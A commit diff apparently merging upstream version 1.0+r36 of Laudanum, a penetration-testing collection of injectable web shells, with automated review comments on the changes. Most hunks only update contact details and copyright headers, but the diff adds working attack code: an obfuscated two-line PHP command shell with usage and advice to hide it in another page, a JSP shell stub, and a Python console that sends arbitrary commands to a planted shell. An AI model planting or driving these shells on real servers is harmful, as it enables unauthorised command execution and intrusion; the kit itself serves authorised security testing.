Commit 144199c9 authored by Sophie Brun

Merge tag 'upstream/1.0+r36'

Upstream version 1.0+r36
parents c34d550f f624405e
......@@ -2,9 +2,18 @@ The Team
========================================================
- Kevin Johnson
- Project Lead
- @secureideas
- kevin@secureideas.com
- Tim Medin
- Project Lead
- @timmedin
- tim@securitywhole.com
- John Sawyer
- Project Lead
- @johnhsawyer
- john@inguardians.com
- Justin Searle
- Core Developer
......@@ -12,4 +21,4 @@ The Team
Additional Coding
========================================================
- Robin Wood
- Jason Gillam (Wordpress Plugin)
\ No newline at end of file
- Jason Gillam (Wordpress Plugin)
Laudanum: Injectable Web Exploit Code v0.8
Laudanum: Injectable Web Exploit Code v1.0
By Kevin Johnson <kjohnson@secureideas.net>
By Kevin Johnson <kjohnson@secureideas.com>
and the Laudanum Development Team
Project Website: http://laudanum.secureideas.net
Project Website: http://laudanum.professionallyevil.com
Sourceforge Site: http://sourceforge.net/projects/laudanum
SVN : svn co https://laudanum.svn.sourceforge.net/svnroot/laudanum laudanum
-------------------------------------------------------------------------------
** Copyright (C) 2014 Kevin Johnson and the Laudanum Project Team
** Copyright (C) 2015 Kevin Johnson and the Laudanum Project Team
**
** This program is free software; you can redistribute it and/or modify
** it under the terms of the GNU General Public License as published by
......
......@@ -5,19 +5,20 @@
' *** A Collection of Injectable Files used during a Penetration Test
' ***
' *** More information is available at:
' *** http://laudanum.secureideas.net
' *** http://laudanum.professionallyevil.com/
' *** laudanum@secureideas.net
' ***
' *** Project Leads:
' *** Kevin Johnson <kjohnson@secureideas.net
' *** Tim Medin <tim@counterhack.com>
' *** Kevin Johnson @secureideas <kjohnson@secureideas.com>
' *** Tim Medin @timmedin <tim@securitywhole.com>
' *** John Sawyer @johnhsawyer <john@inguardians.com>
' ***
' *** Copyright 2014 by Kevin Johnson and the Laudanum Team
' *** Copyright 2015 by The Laudanum Team
' ***
' ********************************************************************************
' ***
' *** This file provides access to DNS on the system.
' *** Written by Tim Medin <tim@counterhack.com>
' *** Written by Tim Medin <tim@securitywhole.com>
' ***
' ********************************************************************************
' *** This program is free software; you can redistribute it and/or
......
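Review bot: The unchanged contact line `laudanum@secureideas.net` now sits next to `<kjohnson@secureideas.com>` and the new `http://laudanum.professionallyevil.com/` URL, so this header mixes the old and new domains. If the project mailbox moved with the rest, update it in the same pass; if it is still valid, leave it. The same header block is repeated in the other files touched by this commit and should get the same answer everywhere.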
......@@ -8,19 +8,20 @@
' *** A Collection of Injectable Files used during a Penetration Test
' ***
' *** More information is available at:
' *** http://laudanum.secureideas.net
' *** http://laudanum.professionallyevil.com/
' *** laudanum@secureideas.net
' ***
' *** Project Leads:
' *** Kevin Johnson <kjohnson@secureideas.net
' *** Tim Medin <tim@counterhack.com>
' *** Kevin Johnson @secureideas <kjohnson@secureideas.com>
' *** Tim Medin @timmedin <tim@securitywhole.com>
' *** John Sawyer @johnhsawyer <john@inguardians.com>
' ***
' *** Copyright 2014 by Kevin Johnson and the Laudanum Team
' *** Copyright 2015 by The Laudanum Team
' ***
' ********************************************************************************
' ***
' *** This file provides access to the file system.
' *** Written by Tim Medin <tim@counterhack.com>
' *** Written by Tim Medin <tim@securitywhole.com>
' ***
' ********************************************************************************
' *** This program is free software; you can redistribute it and/or
......
......@@ -8,19 +8,20 @@
' *** A Collection of Injectable Files used during a Penetration Test
' ***
' *** More information is available at:
' *** http://laudanum.secureideas.net
' *** http://laudanum.professionallyevil.com/
' *** laudanum@secureideas.net
' ***
' *** Project Leads:
' *** Kevin Johnson <kjohnson@secureideas.net
' *** Tim Medin <tim@counterhack.com>
' *** Kevin Johnson @secureideas <kjohnson@secureideas.com>
' *** Tim Medin @timmedin <tim@securitywhole.com>
' *** John Sawyer @johnhsawyer <john@inguardians.com>
' ***
' *** Copyright 2014 by Kevin Johnson and the Laudanum Team
' *** Copyright 2015 by The Laudanum Team
' ***
' ********************************************************************************
' ***
' *** This file provides access as a proxy.
' *** Written by Tim Medin <tim@counterhack.com>
' *** Written by Tim Medin <tim@securitywhole.com>
' ***
' ********************************************************************************
' *** This program is free software; you can redistribute it and/or
......
......@@ -5,19 +5,20 @@
' *** A Collection of Injectable Files used during a Penetration Test
' ***
' *** More information is available at:
' *** http://laudanum.secureideas.net
' *** http://laudanum.professionallyevil.com/
' *** laudanum@secureideas.net
' ***
' *** Project Leads:
' *** Kevin Johnson <kjohnson@secureideas.net
' *** Tim Medin <tim@counterhack.com>
' *** Kevin Johnson @secureideas <kjohnson@secureideas.com>
' *** Tim Medin @timmedin <tim@securitywhole.com>
' *** John Sawyer @johnhsawyer <john@inguardians.com>
' ***
' *** Copyright 2014 by Kevin Johnson and the Laudanum Team
' *** Copyright 2015 by The Laudanum Team
' ***
' ********************************************************************************
' ***
' *** Updated and fixed by Robin Wood <Digininja>
' *** Updated and fixed by Tim Medin <tim@counterhack.com
' *** Updated and fixed by Tim Medin <tim@securitywhole.com>
' ***
' ********************************************************************************
' *** This program is free software; you can redistribute it and/or
......
......@@ -9,14 +9,15 @@
*** A Collection of Injectable Files used during a Penetration Test
***
*** More information is available at:
*** http://laudanum.secureideas.net
*** http://laudanum.professionallyevil.com/
*** laudanum@secureideas.net
***
*** Project Leads:
*** Kevin Johnson <kjohnson@secureideas.net>
*** Tim Medin <tim@counterhack.com>
*** Kevin Johnson @secureideas <kjohnson@secureideas.com>
*** Tim Medin @timmedin <tim@securitywhole.com>
*** John Sawyer @johnhsawyer <john@inguardians.com>
***
*** Copyright 2014 by Kevin Johnson and the Laudanum Team
*** Copyright 2015 by The Laudanum Team
***
********************************************************************************
***
......
<!---
/* *****************************************************************************
***
*** Laudanum Project
*** A Collection of Injectable Files used during a Penetration Test
***
*** More information is available at:
*** http://laudanum.professionallyevil.com/
*** laudanum@secureideas.net
***
*** Project Leads:
*** Kevin Johnson @secureideas <kjohnson@secureideas.net
*** Tim Medin @timmedin <tim@securitywhole.com>
*** John Sawyer @johnhsawyer <john@inguardians.com>
***
*** Copyright 2015 by The Laudanum Team
***
********************************************************************************
***
*** This file provides access to shell access on the system.
*** Sourced from http://www.bennadel.com/blog/726-coldfusion-application-cfc-tutorial-and-application-cfc-reference.htm
*** Modified by Tim Medin
***
********************************************************************************
*** This program is free software; you can redistribute it and/or
*** modify it under the terms of the GNU General Public License
*** as published by the Free Software Foundation; either version 2
*** of the License, or (at your option) any later version.
***
*** This program is distributed in the hope that it will be useful,
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
*** GNU General Public License for more details.
***
*** You can get a copy of the GNU General Public License from this
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1^
*** You can also write to the Free Software Foundation, Inc., 59 Temple
*** Place - Suite 330, Boston, MA 02111-1307, USA.
***
***************************************************************************** */
--->
<cfcomponent
displayname="Application"
output="true"
hint="Handle the application.">
<!--- Set up the application. --->
<cfset THIS.Name = "AppCFC" />
<cfset THIS.ApplicationTimeout = CreateTimeSpan( 0, 0, 1, 0 ) />
<cfset THIS.SessionManagement = true />
<cfset THIS.SetClientCookies = false />
<!--- Define the page request properties. --->
<cfsetting
requesttimeout="20"
showdebugoutput="false"
enablecfoutputonly="false"
/>
<cffunction
name="OnApplicationStart"
access="public"
returntype="boolean"
output="false"
hint="Fires when the application is first created.">
<!--- Return out. --->
<cfreturn true />
</cffunction>
<cffunction
name="OnSessionStart"
access="public"
returntype="void"
output="false"
hint="Fires when the session is first created.">
<!--- Return out. --->
<cfreturn />
</cffunction>
<cffunction
name="OnRequestStart"
access="public"
returntype="boolean"
output="false"
hint="Fires at first part of page processing.">
<!--- Define arguments. --->
<cfargument
name="TargetPage"
type="string"
required="true"
/>
<!--- Return out. --->
<cfreturn true />
</cffunction>
<cffunction
name="OnRequest"
access="public"
returntype="void"
output="true"
hint="Fires after pre page processing is complete.">
<!--- Define arguments. --->
<cfargument
name="TargetPage"
type="string"
required="true"
/>
<!--- Include the requested page. --->
<cfinclude template="#ARGUMENTS.TargetPage#" />
<!--- Return out. --->
<cfreturn />
</cffunction>
<cffunction
name="OnRequestEnd"
access="public"
returntype="void"
output="true"
hint="Fires after the page processing is complete.">
<!--- Return out. --->
<cfreturn />
</cffunction>
<cffunction
name="OnSessionEnd"
access="public"
returntype="void"
output="false"
hint="Fires when the session is terminated.">
<!--- Define arguments. --->
<cfargument
name="SessionScope"
type="struct"
required="true"
/>
<cfargument
name="ApplicationScope"
type="struct"
required="false"
default="#StructNew()#"
/>
<!--- Return out. --->
<cfreturn />
</cffunction>
<cffunction
name="OnApplicationEnd"
access="public"
returntype="void"
output="false"
hint="Fires when the application is terminated.">
<!--- Define arguments. --->
<cfargument
name="ApplicationScope"
type="struct"
required="false"
default="#StructNew()#"
/>
<!--- Return out. --->
<cfreturn />
</cffunction>
<cffunction
name="OnError"
access="public"
returntype="void"
output="true"
hint="Fires when an exception occures that is not caught by a try/catch.">
<!--- Define arguments. --->
<cfargument
name="Exception"
type="any"
required="true"
/>
<cfargument
name="EventName"
type="string"
required="false"
default=""
/>
<!--- Return out. --->
<cfreturn />
</cffunction>
</cfcomponent>
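Review bot: The header description `This file provides access to shell access on the system.` does not match the component below it, which only defines the application lifecycle handlers and, in `OnRequest`, includes `#ARGUMENTS.TargetPage#`; state what this component is for in the kit. In the same header, `<kjohnson@secureideas.net` is missing its closing `>` and uses the .net address where the other headers in this commit use `<kjohnson@secureideas.com>`, the GPL URL ends in a stray `^`, and the `OnError` hint spells "occurs" as `occures`.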
......@@ -7,14 +7,15 @@
*** A Collection of Injectable Files used during a Penetration Test
***
*** More information is available at:
*** http://laudanum.secureideas.net
*** http://laudanum.professionallyevil.com/
*** laudanum@secureideas.net
***
*** Project Leads:
*** Kevin Johnson <kjohnson@secureideas.net
*** Tim Medin <tim@securitywhole.com>
*** Kevin Johnson @secureideas <kjohnson@secureideas.net
*** Tim Medin @timmedin <tim@securitywhole.com>
*** John Sawyer @johnhsawyer <john@inguardians.com>
***
*** Copyright 2014 by Kevin Johnson and the Laudanum Team
*** Copyright 2015 by The Laudanum Team
***
********************************************************************************
***
......
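Review bot: The replacement Kevin Johnson line still reads `<kjohnson@secureideas.net` with no closing `>`, so this hunk carries over the defect that the other headers in the commit fix with `<kjohnson@secureideas.com>`. Use the same line here so the header is identical across files.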
#!/usr/bin/env python
'''
*******************************************************************************
***
*** Laudanum Project
*** A Collection of Injectable Files used during a Penetration Test
***
*** More information is available at:
*** http://laudanum.professionallyevil.com/
*** laudanum@secureideas.net
***
*** Project Leads:
*** Kevin Johnson @secureideas <kjohnson@secureideas.com>
*** Tim Medin @timmedin <tim@securitywhole.com>
*** John Sawyer @johnhsawyer <john@inguardians.com>
***
*** Copyright 2015 by The Laudanum Team
***
********************************************************************************
***
*** This file provides a console for working with remote shells.
*** //TODO: Add the ability to strip out extra text so only shell output is shown
*** Written by Tim Medin <tim@securitywhole.com>
***
********************************************************************************
*** This program is free software; you can redistribute it and/or
*** modify it under the terms of the GNU General Public License
*** as published by the Free Software Foundation; either version 2
*** of the License, or (at your option) any later version.
***
*** This program is distributed in the hope that it will be useful,
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
*** GNU General Public License for more details.
***
*** You can get a copy of the GNU General Public License from this
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
*** You can also write to the Free Software Foundation, Inc., Temple
*** Place - Suite Boston, MA USA.
***
***************************************************************************** */
'''
import urllib2
import urllib
import base64
import re
origurl = None
origdata = None
replace = []
usebase64 = False
def sendrequest(url, data=None):
if data != None:
resp = urllib2.urlopen(url, data)
else:
resp = urllib2.urlopen(url)
html = resp.read()
resp.close()
if usebase64:
matches = re.findall('[A-Za-z0-9/+]+={0,2}', html)
for m in matches:
print base64.b64decode(m)
else:
print html
# TODO: update this to allow filtering before and after the command
def preparecmd(cmd):
global replace
global usebase64
for r in replace:
cmd = cmd.replace(r[0], r[1])
if usebase64:
cmd += ' | base64 -w 0'
cmd = urllib.quote(cmd)
return cmd
def dointeract():
global origurl
print "Type the commands to run on the remote server"
while True:
cmd = raw_input('> ')
if cmd in ['stop', 'quit', 'exit']:
break
cmd = preparecmd(cmd)
url = origurl.replace('CMD', cmd)
data = origdata.replace('CMD', cmd)
sendrequest(url, data)
def main():
global origurl
global replace
global usebase64
global origdata
import argparse
parser = argparse.ArgumentParser(description='Easy remote shell.')
parser.add_argument('-i', '--interactive', help='interactive', dest='interactive', action='store_true', default=False)
parser.add_argument('-u', '--url', required=True, help='The url', metavar='URL', dest='url')
parser.add_argument('-d', '--data', help='data to send via post', metavar='DATA', dest='data')
parser.add_argument('-c', '--cmd', help='The command to execute (use ++ instead of - unless other override is defined)', metavar='COMMAND', dest='cmd', nargs='+')
parser.add_argument('-r', '--replace', nargs=2, action='append', help='Characters to replace', dest='replace')
# not encryption, don't pretend it is or use it thusly
parser.add_argument('-b', '--base64', help='Attempt to hide with base64 encoded (*Nix Only(', dest='base64', action='store_true', default=False)
args = parser.parse_args()
origurl = args.url
origdata = args.data if args.data else ''
replace = args.replace if args.replace else []
usebase64 = args.base64
if not args.interactive and args.cmd == None:
parser.print_help()
print 'argument -c/--cmd or -i/--interactive are required'
exit(0)
if args.cmd:
#check for the default overrite
if replace and [r[1] for r in replace if r[1]=='-']:
print 'override of - found, ignoring ++'
else:
replace.append(['++', '-'])
cmd = preparecmd(' '.join(args.cmd))
url = origurl.replace('CMD', cmd)
data = origdata.replace('CMD', cmd)
sendrequest(url, data)
if args.interactive:
try:
import readline
except:
pass
dointeract()
if __name__ == '__main__':
main()
\ No newline at end of file
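Review bot: In `main()`, the missing-argument path prints `argument -c/--cmd or -i/--interactive are required` and then calls `exit(0)`, so a usage error reports success to the calling shell; `parser.error(...)` prints the message and exits non-zero. Smaller points: the docstring header ends with `*/` copied from a C-style comment, the FSF address reads `Temple Place - Suite Boston, MA USA` with the numbers missing, the `--base64` help text has an unbalanced `(*Nix Only(`, the bare `except:` around `import readline` should be `except ImportError:`, and the file has no trailing newline.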
<%@ page import="java.util.*,java.io.*"%>
<%
/*
*******************************************************************************
***
*** Laudanum Project
*** A Collection of Injectable Files used during a Penetration Test
***
*** More information is available at:
*** http://laudanum.professionallyevil.com/
*** laudanum@secureideas.net
***
*** Project Leads:
*** Kevin Johnson @secureideas <kjohnson@secureideas.com>
*** Tim Medin @timmedin <tim@securitywhole.com>
*** John Sawyer @johnhsawyer <john@inguardians.com>
***
*** Copyright 2015 by The Laudanum Team
***
********************************************************************************
***
*** This file provides access to shell access to the system.
*** Written by Tim Medin <tim@securitywhole.com>
***
********************************************************************************
*** This program is free software; you can redistribute it and/or
*** modify it under the terms of the GNU General Public License
*** as published by the Free Software Foundation; either version 2
*** of the License, or (at your option) any later version.
***
*** This program is distributed in the hope that it will be useful,
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
*** GNU General Public License for more details.
***
*** You can get a copy of the GNU General Public License from this
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
*** You can also write to the Free Software Foundation, Inc., Temple
*** Place - Suite Boston, MA USA.
***
*****************************************************************************
*/
if (request.getRemoteAddr() != "4.4.4.4") {
response.sendError(HttpServletResponse.SC_NOT_FOUND)
return;
......
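Review bot: The source-address check `request.getRemoteAddr() != "4.4.4.4"` compares String references rather than contents, so it does not actually test the client address; compare with `!"4.4.4.4".equals(request.getRemoteAddr())`. The next line, `response.sendError(HttpServletResponse.SC_NOT_FOUND)`, is missing its semicolon, so the page will not compile as committed. The FSF address in the header also reads `Temple Place - Suite Boston, MA USA` with the numbers missing.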
......@@ -5,19 +5,20 @@
*** A Collection of Injectable Files used during a Penetration Test
***
*** More information is available at:
*** http://laudanum.secureideas.net
*** http://laudanum.professionallyevil.com/
*** laudanum@secureideas.net
***
*** Project Leads:
*** Kevin Johnson <kjohnson@secureideas.net
*** Tim Medin <tim@counterhack.com>
*** Kevin Johnson @secureideas <kjohnson@secureideas.com>
*** Tim Medin @timmedin <tim@securitywhole.com>
*** John Sawyer @johnhsawyer <john@inguardians.com>
***
*** Copyright 2014 by Kevin Johnson and the Laudanum Team
*** Copyright 2015 by The Laudanum Team
***
********************************************************************************
***
*** This file provides access to DNS on the system.
*** Written by Tim Medin <tim@counterhack.com>
*** Written by Tim Medin <tim@securitywhole.com>
***
********************************************************************************
*** This program is free software; you can redistribute it and/or
......
......@@ -5,19 +5,20 @@
*** A Collection of Injectable Files used during a Penetration Test
***
*** More information is available at:
*** http://laudanum.secureideas.net
*** http://laudanum.professionallyevil.com/
*** laudanum@secureideas.net
***
*** Project Leads:
*** Kevin Johnson <kjohnson@secureideas.net
*** Tim Medin <tim@counterhack.com>
*** Kevin Johnson @secureideas <kjohnson@secureideas.com>
*** Tim Medin @timmedin <tim@securitywhole.com>
*** John Sawyer @johnhsawyer <john@inguardians.com>
***
*** Copyright 2014 by Kevin Johnson and the Laudanum Team
*** Copyright 2015 by The Laudanum Team
***
********************************************************************************
***
*** This file allows browsing of the file system.
*** Written by Tim Medin <tim@counterhack.com>
*** Written by Tim Medin <tim@securitywhole.com>
*** 2013-12-28 Updated by Jason Gillam - fixed parent folder
***
********************************************************************************
......
<?php
/*
******************************************************************************
***
*** Laudanum Project
*** A Collection of Injectable Files used during a Penetration Test
***
*** More information is available at:
*** http://laudanum.professionallyevil.com/
*** laudanum@secureideas.net
***
*** Project Leads:
*** Kevin Johnson @secureideas <kjohnson@secureideas.com>
*** Tim Medin @timmedin <tim@securitywhole.com>
*** John Sawyer @johnhsawyer <john@inguardians.com>
***
*** Copyright 2015 by The Laudanum Team
***
********************************************************************************
***
*** This file provides access to the file system.
*** Written by Tim Medin <tim@securitywhole.com>
***
********************************************************************************
***
*** This is a tiny shell that is well obfuscated
*** to use it run it thusly:
***  http://Site/shell.php?ctime=system&atime=ls+-la
*** It is best hidden in another php page
***
*** WARNING: This shell is not protected by an ip filter or credential check
********************************************************************************
*/
@extract($_REQUEST);
@die ($ctime($atime));
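Review bot: The header line `This file provides access to the file system.` does not match the comment block below it or the body, which describe a command shell, so the description looks copied from the file browser. The `WARNING` line is the only indication that this file has no source-address restriction like the one in the JSP shell added in this commit; move that statement into the first description line and mention it in the README so the file is not deployed on the assumption that it carries the same restriction.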
......@@ -5,14 +5,15 @@
*** A Collection of Injectable Files used during a Penetration Test
***
*** More information is available at:
*** http://laudanum.secureideas.net
*** http://laudanum.professionallyevil.com/
*** laudanum@secureideas.net
***
*** Project Leads:
*** Kevin Johnson <kjohnson@secureideas.net
*** Tim Medin <tim@counterhack.com>
*** Kevin Johnson @secureideas <kjohnson@secureideas.com>
*** Tim Medin @timmedin <tim@securitywhole.com>
*** John Sawyer @johnhsawyer <john@inguardians.com>
***
*** Copyright 2014 by Kevin Johnson and the Laudanum Team
*** Copyright 2015 by The Laudanum Team
***
********************************************************************************
***
......
......@@ -5,14 +5,15 @@
*** A Collection of Injectable Files used during a Penetration Test
***
*** More information is available at:
*** http://laudanum.secureideas.net
*** http://laudanum.professionallyevil.com/
*** laudanum@secureideas.net
***
*** Project Leads:
*** Kevin Johnson <kjohnson@secureideas.net>
*** Tim Medin <tim@counterhack.com>
*** Kevin Johnson @secureideas <kjohnson@secureideas.com>
*** Tim Medin @timmedin <tim@securitywhole.com>
*** John Sawyer @johnhsawyer <john@inguardians.com>
***
*** Copyright 2014 by Kevin Johnson and the Laudanum Team
*** Copyright 2015 by The Laudanum Team
***
********************************************************************************
***
......
......@@ -6,19 +6,20 @@ ini_set('session.use_cookies', '0');
*** A Collection of Injectable Files used during a Penetration Test
***
*** More information is available at:
*** http://laudanum.secureideas.net
*** http://laudanum.professionallyevil.com/
*** laudanum@secureideas.net
***
*** Project Leads:
*** Kevin Johnson <kjohnson@secureideas.net
*** Tim Medin <tim@counterhack.com>
*** Kevin Johnson @secureideas <kjohnson@secureideas.com>
*** Tim Medin @timmedin <tim@securitywhole.com>
*** John Sawyer @johnhsawyer <john@inguardians.com>
***